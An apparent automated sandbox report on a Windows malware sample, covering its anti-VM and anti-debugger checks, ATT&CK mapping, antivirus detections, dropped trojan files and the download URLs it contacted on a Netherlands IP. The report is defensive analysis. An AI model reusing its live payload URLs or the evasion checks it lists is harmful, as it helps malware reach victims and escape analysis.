Source: file.exe, file.exe, 00000000.00000002.2877232140.00000000009AE000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.13.dr Binary or memory string: VMware
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: file.exe, 00000000.00000002.2878230701.0000000001021000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2484413673.00000000055D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2769642556.00000000055D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2509895902.00000000055D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2458794612.00000000055D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2535134365.00000000055D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2880688079.00000000055D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.13.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr Binary or memory string: vmci.sys
Source: Amcache.hve.13.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.2877232140.00000000009AE000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.13.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AAD2A9 rdtsc 0_2_00AAD2A9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A54A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10007A76 mov eax, dword ptr fs:[00000030h] 0_2_10007A76
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10005F25 mov eax, dword ptr fs:[00000030h] 0_2_10005F25
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00F6C9E3 push dword ptr fs:[00000030h] 0_2_00F6C9E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B60D90 mov eax, dword ptr fs:[00000030h] 0_2_04B60D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B6092B mov eax, dword ptr fs:[00000030h] 0_2_04B6092B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402EC0 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,HeapFree,VirtualAlloc,0_2_00402EC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004099EA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004099EA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A54A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040CDA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDA3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040A6E0 SetUnhandledExceptionFilter,0_2_0040A6E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10002ADF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_100056A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10002FDA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B69C51 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04B69C51
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B6A7B1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04B6A7B1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B6D00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_04B6D00A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04B6A947 SetUnhandledExceptionFilter,0_2_04B6A947
Source: file.exe, file.exe, 00000000.00000002.2877232140.00000000009AE000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: YJ.Program Manager
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_04D096AC cpuid 0_3_04D096AC
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004107E2 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_004107E2
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 3 Command and Scripting Interpreter | 1 DLL Side-Loading | 2 Process Injection | 11 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 24 Virtualization/Sandbox Evasion | LSASS Memory | 781 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 12 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Process Injection | Security Account Manager | 24 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 3 Process Discovery | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Software Packing | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | 223 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | HEUR/AGEN.1320706 |
file.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\soft[1] | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Y-Cleaner.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1] | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\soft[1] | 75% | ReversingLabs | ByteCode-MSIL.Trojan.Malgent |
C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Bunifu_UI_v1.5.3.dll | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\F0vwruCZSsW0eee3vfe0\Y-Cleaner.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.Malgent |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp= | 0% | Avira URL Cloud | safe |
http://80.82.65.70/files/download21-573d1d5ce43f | 0% | Avira URL Cloud | safe |
http://80.82.65.70/soft/downloadvv | 0% | Avira URL Cloud | safe |
http://80.82.65.70/files/downloadA | 0% | Avira URL Cloud | safe |
http://80.82.65.70/dll/keyk | 0% | Avira URL Cloud | safe |
http://80.82.65.70/dll/downloadC | 0% | Avira URL Cloud | safe |
http://80.82.65.70/dll/key; | 100% | Avira URL Cloud | malware |
http://80.82.65.70/files/download0/files/downloadA | 0% | Avira URL Cloud | safe |
http://80.82.65.70/dll/keyutils.dll | 0% | Avira URL Cloud | safe |
http://80.82.65.70/add?substr=mixtwo&s=three&sub=empW | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ax-0001.ax-msedge.net | 150.171.27.10 | true | false | | high
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://80.82.65.70/soft/download | false | | high
http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp | false | | high
http://80.82.65.70/dll/download | false | | high
http://80.82.65.70/dll/key | false | | high
http://80.82.65.70/files/download | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp= | file.exe, 00000000.00000003.2769642556.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2535134365.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2509895902.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2484413673.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2880688079.00000000055C0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2458794612.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://80.82.65.70/soft/downloadvv | file.exe, 00000000.00000002.2878230701.0000000001009000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g-cleanit.hk | file.exe, 00000000.00000003.2786188984.0000000005680000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2783183777.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.000000000565F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2784140724.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.0000000005621000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr | false | | high
http://80.82.65.70/dll/key; | file.exe, 00000000.00000002.2878230701.0000000001021000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://80.82.65.70/dll/downloadC | file.exe, 00000000.00000002.2880688079.00000000055C0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://80.82.65.70/files/download0/files/download | file.exe, 00000000.00000003.2769642556.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055C3000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.13.dr | false | | high
http://80.82.65.70/files/downloadA | file.exe, 00000000.00000003.2535134365.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174 | file.exe, 00000000.00000003.2786188984.0000000005680000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2783183777.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.000000000565F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2784140724.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.0000000005621000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr | false | | high
https://iplogger.org/1Pz8p7 | file.exe, 00000000.00000003.2786188984.0000000005680000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2783183777.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.000000000565F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2784140724.000000000581E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2786119408.0000000005621000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.dr | false | | high
http://80.82.65.70/dll/keyk | file.exe, 00000000.00000002.2878230701.0000000001021000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://80.82.65.70/files/download0/files/downloadA | file.exe, 00000000.00000003.2769642556.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055C3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://80.82.65.70/dll/keyutils.dll | file.exe, 00000000.00000003.2535134365.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2509895902.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2484413673.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2458794612.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://80.82.65.70/add?substr=mixtwo&s=three&sub=empW | file.exe, 00000000.00000003.2769642556.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2535134365.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2509895902.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2484413673.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2458794612.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://80.82.65.70/files/download21-573d1d5ce43f | file.exe, 00000000.00000003.2769642556.00000000055C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2716238809.00000000055C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2560664690.00000000055C4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
80.82.65.70 | unknown | Netherlands | | 202425 | INT-NETWORKSC | false

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1574459
                          Start date and time:2024-12-13 10:47:16 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 34s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:16
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.evad.winEXE@2/15@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 20.190.147.1, 20.190.177.149, 20.190.147.6, 20.190.177.85, 20.190.147.11, 20.190.177.146, 20.190.177.23, 20.190.147.5, 104.208.16.94, 20.231.128.66, 20.223.35.26, 13.107.246.63, 20.109.210.53, 23.206.197.19, 150.171.27.10
                          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: file.exe
Time | Type | Description
04:48:45 | API Interceptor | 32777x Sleep call for process: file.exe modified
04:49:24 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
80.82.65.70 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 80.82.65.70/soft/download
80.82.65.70 | file.exe | malicious | Unknown | 80.82.65.70/soft/download
80.82.65.70 | 6gnaXMdquM.exe | malicious | Unknown | 80.82.65.70/name
80.82.65.70 | rJB2nbYcHj.exe | malicious | Unknown | 80.82.65.70/name
80.82.65.70 | tWAHWXyUW3.exe | malicious | Unknown | 80.82.65.70/name
80.82.65.70 | 6gnaXMdquM.exe | malicious | Unknown | 80.82.65.70/name
80.82.65.70 | GElFwKwcjS.exe | malicious | Unknown | 80.82.65.70/name
80.82.65.70 | rJB2nbYcHj.exe | malicious | Unknown | 80.82.65.70/name
80.82.65.70 | tWAHWXyUW3.exe | malicious | Unknown | 80.82.65.70/name
80.82.65.70 | GElFwKwcjS.exe | malicious | Unknown | 80.82.65.70/name
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ax-0001.ax-msedge.net | Ni2ghr9eUJ.exe | malicious | Socks5Systemz | 150.171.27.10
ax-0001.ax-msedge.net | file.exe | malicious | Credential Flusher | 150.171.28.10
ax-0001.ax-msedge.net | file.exe | malicious | Credential Flusher | 150.171.27.10
ax-0001.ax-msedge.net | file.exe | malicious | Credential Flusher | 150.171.27.10
ax-0001.ax-msedge.net | QyzM5yhuwd.exe | malicious | MedusaLocker | 150.171.27.10
ax-0001.ax-msedge.net | file.exe | malicious | Unknown | 150.171.28.10
ax-0001.ax-msedge.net | 6C2Oryo96G.exe | malicious | Unknown | 150.171.27.10
ax-0001.ax-msedge.net | win.exe | malicious | Lynx | 150.171.28.10
ax-0001.ax-msedge.net | RunScriptProtected.lnk.d.lnk | malicious | Unknown | 150.171.27.10
ax-0001.ax-msedge.net | dkarts.dll.dll | malicious | Unknown | 150.171.27.10
fp2e7a.wpc.phicdn.net | MN2MXYYRQG.exe | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 192.229.221.95
fp2e7a.wpc.phicdn.net | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 192.229.221.95
fp2e7a.wpc.phicdn.net | RFQ3978 39793980.pdf.exe | malicious | FormBook | 192.229.221.95
fp2e7a.wpc.phicdn.net | MKY8R16rwk.exe | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | 137gv6WKud.dll | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | https://mavenclinic.quatrix.it | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | pPLwX9wSrD.exe | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | 6C2Oryo96G.exe | malicious | Unknown | 192.229.221.95
fp2e7a.wpc.phicdn.net | tntexpedio.exe | malicious | Unknown | 192.229.221.95
Match | Associated Sample Name / URL | Detection | Threat Name | Context
INT-NETWORKSC | file.exe | malicious | Unknown | 80.82.65.70
INT-NETWORKSC | 6gnaXMdquM.exe | malicious | Unknown | 80.82.65.70
INT-NETWORKSC | rJB2nbYcHj.exe | malicious | Unknown | 80.82.65.70
INT-NETWORKSC | tWAHWXyUW3.exe | malicious | Unknown | 80.82.65.70
INT-NETWORKSC | 6gnaXMdquM.exe | malicious | Unknown | 80.82.65.70
INT-NETWORKSC | GElFwKwcjS.exe | malicious | Unknown | 80.82.65.70
INT-NETWORKSC | rJB2nbYcHj.exe | malicious | Unknown | 80.82.65.70
INT-NETWORKSC | tWAHWXyUW3.exe | malicious | Unknown | 80.82.65.70
INT-NETWORKSC | GElFwKwcjS.exe | malicious | Unknown | 80.82.65.70
INT-NETWORKSC | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | 80.82.65.70
                          No context
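Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1] | file.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1] | file.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1] | file.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1] | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1] | file.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1] | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1] | file.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1] | file.exe | malicious | Unknown
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1] | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\dll[1] | file.exe | malicious | Unknown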
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):0.9713116193690797
                                              Encrypted:false
                                              SSDEEP:192:oUsr5+vwPiA0u1Od03judvszuiFJnZ24IO8ThBV:Qqwou1OijPzuiFJnY4IO8L
                                              MD5:52F12E1791B1FD04F13BD7BE6445827E
                                              SHA1:55F168B9AEB80F043B44823CAE51B15A526C9837
                                              SHA-256:E76ABE34C767D2A8B2BCC247C98BCCC3671887A95291CDE0BD453465E177DD40
                                              SHA-512:0C4964D9AA20A3A707455B3C139FC9CC735D3EDBB3C49EAEA2FA0D9644F6BF5C8EFE389222ECBC8CA73C87F6BB96789AB06AC5C09CCC69B3336224290E505FA0
                                              Malicious:true
                                              Reputation:low
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 14 streams, Fri Dec 13 09:49:18 2024, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):46132
                                              Entropy (8bit):2.545319373780476
                                              Encrypted:false
